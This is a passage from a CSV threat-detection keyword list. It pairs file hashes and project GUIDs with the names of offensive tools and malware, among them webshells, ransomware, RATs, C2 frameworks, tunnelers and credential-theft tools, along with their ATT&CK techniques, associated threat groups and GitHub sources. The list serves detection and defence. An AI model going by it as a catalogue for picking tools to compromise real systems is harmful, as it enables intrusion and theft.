TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","42385" "*e91f4e67f48ea790700ec6c55be53c6d2ceb6dd091de3de5074d559cfdfdf02e*",".{0,1000}e91f4e67f48ea790700ec6c55be53c6d2ceb6dd091de3de5074d559cfdfdf02e.{0,1000}","offensive_tool_keyword","File-Tunnel","Tunnel TCP connections through a file","T1071 - T1105 - T1090","TA0005 - TA0008 - TA0011","N/A","N/A","Lateral Movement","https://github.com/fiddyschmitt/File-Tunnel","1","0","#filehash","N/A","10","10","925","82","2025-04-19T15:06:09Z","2023-02-05T12:57:45Z","42386" "*e91f8a229b999a3a09389cddbdc7288de7b1905f8b69dc48a59e8249938eb82f*",".{0,1000}e91f8a229b999a3a09389cddbdc7288de7b1905f8b69dc48a59e8249938eb82f.{0,1000}","offensive_tool_keyword","gTunnel","tunelling solution written in golang","T1573.002 - T1071 - T1090 - T1105 - T1020","TA0005 - TA0010 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/hotnops/gTunnel","1","0","#filehash","N/A","10","10","266","49","2023-05-17T05:24:58Z","2020-03-09T02:52:48Z","42387" "*e920909e0910ab0c7aaf3e402f997d6e05e3a843ef9504b2c97389e76cb38e76*",".{0,1000}e920909e0910ab0c7aaf3e402f997d6e05e3a843ef9504b2c97389e76cb38e76.{0,1000}","offensive_tool_keyword","GonnaCry","a linux ransomware","T1486 - T1059 - T1020 - T1083 - T1070","TA0040 - TA0005 - TA0009 - TA0010","N/A","N/A","Ransomware","https://github.com/tarcisio-marinho/GonnaCry","1","0","#filehash #linux","N/A","10","8","717","402","2025-01-24T13:39:57Z","2017-05-12T23:46:28Z","42388" "*e9255f6726a695cab4ecf9d7ac34c1dd5dde9ac55a3289892a43ee7869e2a0f1*",".{0,1000}e9255f6726a695cab4ecf9d7ac34c1dd5dde9ac55a3289892a43ee7869e2a0f1.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux 
#windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","42390" "*e92707537fe99713752f3d3f479fa68a0c8dd80439c13a2bb4ebb36a952b63fd*",".{0,1000}e92707537fe99713752f3d3f479fa68a0c8dd80439c13a2bb4ebb36a952b63fd.{0,1000}","offensive_tool_keyword","Xworm","Malware with wide range of capabilities ranging from RAT to ransomware","T1562 - T1547 - T1056 - T1125 - T1496 - T1486 - T1219 - T1567 - T1564 - T1027","TA0005 - TA0003 - TA0009 - TA0040 - TA0002 - TA0006 - TA0010 - TA0004 - TA0007 - TA0008 - TA0011","N/A","N/A","Malware","https://github.com/guessthatname99/XWorm-RAT-V2.1","1","0","#filehash","N/A","10","","N/A","","","","42391" "*e92d814a584ef1960b96cd7483babd6e74a49563ee2b55955ee5fed98687993a*",".{0,1000}e92d814a584ef1960b96cd7483babd6e74a49563ee2b55955ee5fed98687993a.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","42393" "*e94a8fed78081e5ea7157fdbc2828cef104abd248d285f48e4715a994a83ac76*",".{0,1000}e94a8fed78081e5ea7157fdbc2828cef104abd248d285f48e4715a994a83ac76.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","42394" "*e94c155441d49eaa70f62dfd39216a300593eb5fa502022be4c1059c02ca9712*",".{0,1000}e94c155441d49eaa70f62dfd39216a300593eb5fa502022be4c1059c02ca9712.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - 
T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","42395" "*e94c578a73298e4f6dbb5b3cb4cf4adcea54f6a971e88428f651cd555e5932b0*",".{0,1000}e94c578a73298e4f6dbb5b3cb4cf4adcea54f6a971e88428f651cd555e5932b0.{0,1000}","offensive_tool_keyword","DCSyncer","Perform DCSync operation","T1003.006","TA0006 - TA0004","N/A","N/A","Credential Access","https://github.com/notsoshant/DCSyncer","1","0","#filehash","N/A","10","2","143","22","2024-11-05T20:03:27Z","2020-06-06T17:20:22Z","42396" "*e94cb3644275a5675abf5146e368ec04147570db966781014bf320c921ccbfd2*",".{0,1000}e94cb3644275a5675abf5146e368ec04147570db966781014bf320c921ccbfd2.{0,1000}","offensive_tool_keyword","PSAttack","PSAttack contains over 100 commands for Privilege Escalation - Recon and Data Exfilitration","T1059 - T1212 - T1012 - T1087 - T1005 - T1041 - T1020","TA0002 - TA0004 - TA0005 - TA0007 - TA0010 - TA0008","N/A","N/A","Exploitation tool","https://github.com/GDSSecurity/PSAttack","1","0","#filehash","N/A","10","1","45","15","2017-04-04T20:37:33Z","2016-02-22T23:45:22Z","42397" "*e953e1f2e64f00273fe92e24d434d7a6619bb873d43bef5dd330d42de591dc8d*",".{0,1000}e953e1f2e64f00273fe92e24d434d7a6619bb873d43bef5dd330d42de591dc8d.{0,1000}","offensive_tool_keyword","Omnispray","Modular Enumeration and Password Spraying Framework","T1110 - T1078.003 - T1087.002 - T1621","TA0001 - TA0002 - TA0006 - TA0007 - TA0009","N/A","N/A","Credential Access","https://github.com/0xZDH/Omnispray","1","0","#filehash","N/A","10","2","118","19","2024-04-10T20:05:46Z","2021-02-25T07:28:06Z","42399" "*e954e3675ef895c2a316f74b5801d9966597c35bf728020add026fc9e56473e6*",".{0,1000}e954e3675ef895c2a316f74b5801d9966597c35bf728020add026fc9e56473e6.{0,1000}","offensive_tool_keyword","Slackor","A Golang implant 
that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","0","#filehash","N/A","10","10","463","108","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z","42400" "*e95cf71f61072940249aa53e3816205ba0ad7d5fe5611344bbecfc83f9e6f86a*",".{0,1000}e95cf71f61072940249aa53e3816205ba0ad7d5fe5611344bbecfc83f9e6f86a.{0,1000}","offensive_tool_keyword","PrivFu","get SYSTEM integrity level by abusing arbitrary kernel write vulnerability and token privileges","T1068 - T1134 - T1134.001 - T1078 - T1059","TA0004 - TA0009 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu","1","0","#filehash","KernelWritePoCs","10","9","849","122","2025-01-21T05:22:50Z","2021-12-28T13:14:25Z","42401" "*e95eb9af49be9d5c4c95a832bd36c192a570f0dd649cfd24b81de5e3e6262236*",".{0,1000}e95eb9af49be9d5c4c95a832bd36c192a570f0dd649cfd24b81de5e3e6262236.{0,1000}","offensive_tool_keyword","NamedPipeMaster","a tool used to analyze monitor and interact with named pipes - allows dll injection and impersonation","T1055.001 - T1134.001 - T1010 - T1550.002","TA0007 - TA0008 - TA0004 - TA0005","N/A","N/A","Exploitation tool","https://github.com/zeze-zeze/NamedPipeMaster","1","0","#filehash","N/A","9","2","161","15","2024-10-27T05:24:11Z","2024-08-23T02:03:44Z","42402" "*e96e826e534e4ed95244cfdb1147d13b3805c46468be98ed540be2fab68d586d*",".{0,1000}e96e826e534e4ed95244cfdb1147d13b3805c46468be98ed540be2fab68d586d.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black 
Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","42405" "*e9711f47cf9171f79bf34b342279f6fd9275c8ae65f3eb2c6ebb0b8432ea14f8*",".{0,1000}e9711f47cf9171f79bf34b342279f6fd9275c8ae65f3eb2c6ebb0b8432ea14f8.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","#filehash","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","42406" "*e9711f47cf9171f79bf34b342279f6fd9275c8ae65f3eb2c6ebb0b8432ea14f8*",".{0,1000}e9711f47cf9171f79bf34b342279f6fd9275c8ae65f3eb2c6ebb0b8432ea14f8.{0,1000}","offensive_tool_keyword","SharPersist","SharPersist Windows persistence toolkit written in C#.","T1547 - T1053 - T1027 - T1028 - T1112","TA0003 - TA0008","N/A","N/A","Persistence","https://github.com/fireeye/SharPersist","1","0","#filehash","N/A","10","10","1460","257","2023-08-11T00:52:09Z","2019-06-21T13:32:14Z","42407" "*e977ee0a5a2f0063f34b0b744b0753e65990e9467843b0dec3c281a6d4a2e009*",".{0,1000}e977ee0a5a2f0063f34b0b744b0753e65990e9467843b0dec3c281a6d4a2e009.{0,1000}","offensive_tool_keyword","Dirty-Vanity","injection technique abusing windows fork API to evade EDRs","T1055 - T1562 - T1070 - T1027","TA0005 - TA0006","N/A","N/A","Defense Evasion","https://github.com/deepinstinct/Dirty-Vanity","1","0","#filehash","N/A","10","7","633","86","2022-12-23T10:54:10Z","2022-11-24T10:54:00Z","42408" 
"*e97965976cb84019118fee8e28bf175735ed5f65de3c4227bd03ffadb2646d50*",".{0,1000}e97965976cb84019118fee8e28bf175735ed5f65de3c4227bd03ffadb2646d50.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","42409" "*e97d6c8f6d2fc73bceefac93fdfa2c4724a68e58b26e4c2631e78580f2722d2a*",".{0,1000}e97d6c8f6d2fc73bceefac93fdfa2c4724a68e58b26e4c2631e78580f2722d2a.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","#filehash","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","42410" "*e97d6c8f6d2fc73bceefac93fdfa2c4724a68e58b26e4c2631e78580f2722d2a*",".{0,1000}e97d6c8f6d2fc73bceefac93fdfa2c4724a68e58b26e4c2631e78580f2722d2a.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/LuemmelSec/ntlmrelayx.py_to_exe","1","0","#filehash","N/A","10","1","86","17","2023-05-26T05:35:52Z","2023-05-15T17:58:26Z","42411" "*e97da4284459149541ef261a6de0bec7ef8a3d2d28d3384b7b256c089d524690*",".{0,1000}e97da4284459149541ef261a6de0bec7ef8a3d2d28d3384b7b256c089d524690.{0,1000}","offensive_tool_keyword","RouterScan","a penetration testing tool to maliciously scan for and brute force routers - cameras and network-attached storage devices with web interfaces","T1110","TA0006 - TA0007","RouterScan","Conti","Credential Access","https://github.com/mustafashykh/router-scan","1","0","#filehash","N/A","8","1","83","44","2019-02-24T14:31:16Z","2019-02-24T07:52:22Z","42412" "*e984f5efade9dcf131cc020a3c3ebf27f7b191eede39b09969be4d36a1ba9fb2*",".{0,1000}e984f5efade9dcf131cc020a3c3ebf27f7b191eede39b09969be4d36a1ba9fb2.{0,1000}","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","0","#filehash","N/A","10","10","463","108","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z","42413" "*e988e9a36810fb0fa0fb32556cb93c8ea4117e4176402ff74e397bd4a4d125d6*",".{0,1000}e988e9a36810fb0fa0fb32556cb93c8ea4117e4176402ff74e397bd4a4d125d6.{0,1000}","offensive_tool_keyword","evilginx2","Standalone 
man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0001","N/A","BlackCat - COLDRIVER - Black Basta","Phishing","https://github.com/An0nUD4Y/evilginx2","1","0","#filehash","N/A","10","","N/A","","","","42414" "*e98bb5dcf6f202575e80431612a35d072adca1f57cb74d9e198dd51e6fe6a483*",".{0,1000}e98bb5dcf6f202575e80431612a35d072adca1f57cb74d9e198dd51e6fe6a483.{0,1000}","offensive_tool_keyword","knowsmore","KnowsMore is a swiss army knife tool for pentesting Microsoft Active Directory (NTLM Hashes - BloodHound - NTDS and DCSync).","T1003 - T1098 - T1134 - T1484 - T1178 - T1078","TA0006 - TA0008 - TA0003 - TA0011 - TA0005","N/A","Black Basta","Credential Access","https://github.com/helviojunior/knowsmore","1","0","#filehash","N/A","10","3","223","32","2025-04-14T14:52:09Z","2023-01-09T14:02:37Z","42416" "*e99068fa60039d7b7ad0969f858f228134218014143002abf149f220388b19ec*",".{0,1000}e99068fa60039d7b7ad0969f858f228134218014143002abf149f220388b19ec.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","42417" "*e99068fa60039d7b7ad0969f858f228134218014143002abf149f220388b19ec*",".{0,1000}e99068fa60039d7b7ad0969f858f228134218014143002abf149f220388b19ec.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","42418" 
"*e99068fa60039d7b7ad0969f858f228134218014143002abf149f220388b19ec*",".{0,1000}e99068fa60039d7b7ad0969f858f228134218014143002abf149f220388b19ec.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","42419" "*e99068fa60039d7b7ad0969f858f228134218014143002abf149f220388b19ec*",".{0,1000}e99068fa60039d7b7ad0969f858f228134218014143002abf149f220388b19ec.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","42420" "*E991E6A7-31EA-42E3-A471-90F0090E3AFD*",".{0,1000}E991E6A7\-31EA\-42E3\-A471\-90F0090E3AFD.{0,1000}","offensive_tool_keyword","Shellcode-Hide","simple shellcode Loader - Encoders (base64 - custom - UUID - IPv4 - MAC) - Encryptors (AES) - Fileless Loader (Winhttp socket)","T1059.003 - T1027 - T1132 - T1027.002 - T1045 - T1027.004 - T1105","TA0005 - TA0001 - TA0003","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/Shellcode-Hide","1","0","#GUIDproject","N/A","9","5","416","109","2023-08-02T02:22:20Z","2023-02-05T17:31:43Z","42421" "*e99696eaf1aef7f15ad9a71b917dfcc3bc9288c52808df07ac8f69a93f15aa9c*",".{0,1000}e99696eaf1aef7f15ad9a71b917dfcc3bc9288c52808df07ac8f69a93f15aa9c.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - 
LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","42423" "*e9986bdf879ff9f5e6dfd0fc90531bdc88e854e81a4354b7bf3cc0fd2aedae65*",".{0,1000}e9986bdf879ff9f5e6dfd0fc90531bdc88e854e81a4354b7bf3cc0fd2aedae65.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","0","#filehash","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","42424" "*e99a3bec641c578ceaa05b63b6544daf5b437361c1a5f8742808d8a09df5bca6*",".{0,1000}e99a3bec641c578ceaa05b63b6544daf5b437361c1a5f8742808d8a09df5bca6.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","42425" "*e99ea45f1119a6feadf8bb999cb8e31705a1d8e0470f39144594aa7496de4895*",".{0,1000}e99ea45f1119a6feadf8bb999cb8e31705a1d8e0470f39144594aa7496de4895.{0,1000}","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1087.001 - T1087.002 - T1482 - T1016 - T1018 - T1046","TA0007 - TA0043 - TA0005 - TA0042","Dispossessor - Trickbot - Dridex - Locky - Uyghur - BlackCat - 
ALPHV - Defray777 - RansomExx","APT20 - TA505 - APT29 - GOLD DUPONT - Scattered Spider - UNC3944 - TA2101 - Wizard Spider - Grim Spider - Lunar Spider - Dispossessor","Discovery","https://github.com/BloodHoundAD/SharpHound","1","0","#filehash","N/A","N/A","10","904","195","2025-04-18T20:45:04Z","2021-07-12T17:07:04Z","42427" "*e9a83a9f298baefdcb73e870ad9ec7253247bfa3b7450113c2b5a63e26a8b4ee*",".{0,1000}e9a83a9f298baefdcb73e870ad9ec7253247bfa3b7450113c2b5a63e26a8b4ee.{0,1000}","offensive_tool_keyword","traitor","Automatically exploit low-hanging fruit to pop a root shell. Linux privilege escalation made easy","T1068 - T1548.004 - T1611 - T1203 - T1059.004","TA0004 - TA0001 - TA0002 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/liamg/traitor","1","0","#linux #filehash","N/A","10","10","6853","651","2024-03-12T21:01:14Z","2021-01-24T10:50:15Z","42428" "*e9b70f3a69ae5f1891a1f9b1b93aeb6745d632786e75bc111bc4c6b0ba201f58*",".{0,1000}e9b70f3a69ae5f1891a1f9b1b93aeb6745d632786e75bc111bc4c6b0ba201f58.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","42430" "*e9bddaa720ae081b0ef421bc7c8def328fecb3b4802e4d701297f421473b05bc*",".{0,1000}e9bddaa720ae081b0ef421bc7c8def328fecb3b4802e4d701297f421473b05bc.{0,1000}","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0005 - TA0004","N/A","Evilnum","Defense Evasion","https://github.com/hfiref0x/UACME","1","0","#filehash","N/A","10","10","6711","1348","2025-03-09T03:33:26Z","2015-03-28T12:04:33Z","42431" 
"*e9d37aeb31773787ae50b45e2a923edd31be7f27d1ff0ed5ee3bad45076d03d9*",".{0,1000}e9d37aeb31773787ae50b45e2a923edd31be7f27d1ff0ed5ee3bad45076d03d9.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","#filehash","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","42434" "*e9d6c9f3eeca8db9514443c50651c78b29d68756495d8d973c8d5c00123750e8*",".{0,1000}e9d6c9f3eeca8db9514443c50651c78b29d68756495d8d973c8d5c00123750e8.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","42435" "*E9D90B2A-F563-4A5E-9EFB-B1D6B1E7F8CB*",".{0,1000}E9D90B2A\-F563\-4A5E\-9EFB\-B1D6B1E7F8CB.{0,1000}","offensive_tool_keyword","ConfuserEx","ConfuserEx is a widely used open source obfuscator often found in malware","T1027 - T1045","TA0005 ","N/A","N/A","Defense Evasion","https://github.com/yck1509/ConfuserEx","1","0","#GUIDproject","N/A","6","10","3629","1661","2019-05-14T14:23:56Z","2014-03-28T07:00:26Z","42436" "*e9e2d2794db9b02818784c075f2b71f980803c2c8b372936d0d02cd43f3d05a3*",".{0,1000}e9e2d2794db9b02818784c075f2b71f980803c2c8b372936d0d02cd43f3d05a3.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - 
T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003 - TA0011 -TA0010","N/A","BlackSuit - Royal - BlackCat - COZY BEAR - Black Basta","C2","https://bruteratel.com/","1","0","#filehash","N/A","10","10","N/A","N/A","N/A","N/A","42438" "*e9f65ac196e97ded72d97f6aa514c544c0d660983223a2cbefb6ba45a21973fe*",".{0,1000}e9f65ac196e97ded72d97f6aa514c544c0d660983223a2cbefb6ba45a21973fe.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","42440" "*E9F7C24C-879D-49F2-B9BF-2477DC28E2EE*",".{0,1000}E9F7C24C\-879D\-49F2\-B9BF\-2477DC28E2EE.{0,1000}","offensive_tool_keyword","Sandman","Sandman is a NTP based backdoor for red team engagements in hardened networks.","T1105 - T1027 - T1071.001","TA0011 - TA0005","N/A","N/A","Persistence","https://github.com/Idov31/Sandman","1","0","#GUIDproject","N/A","10","8","785","108","2024-03-31T17:40:15Z","2022-08-21T11:04:45Z","42441" "*e9f9a1009bda251364507673531fb1187d34198ade2c48f7c4e6fe6b76a7d088*",".{0,1000}e9f9a1009bda251364507673531fb1187d34198ade2c48f7c4e6fe6b76a7d088.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. 
Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","42442" "*e9fff62c4585ae6de84da278a20e754ff3ff9ccdd0f11041a43eae84a54a622d*",".{0,1000}e9fff62c4585ae6de84da278a20e754ff3ff9ccdd0f11041a43eae84a54a622d.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","42445" "*ea080f879bb8b915bc671813077aed9e350b286df348dfc5a84429a816fc8b96*",".{0,1000}ea080f879bb8b915bc671813077aed9e350b286df348dfc5a84429a816fc8b96.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","42449" 
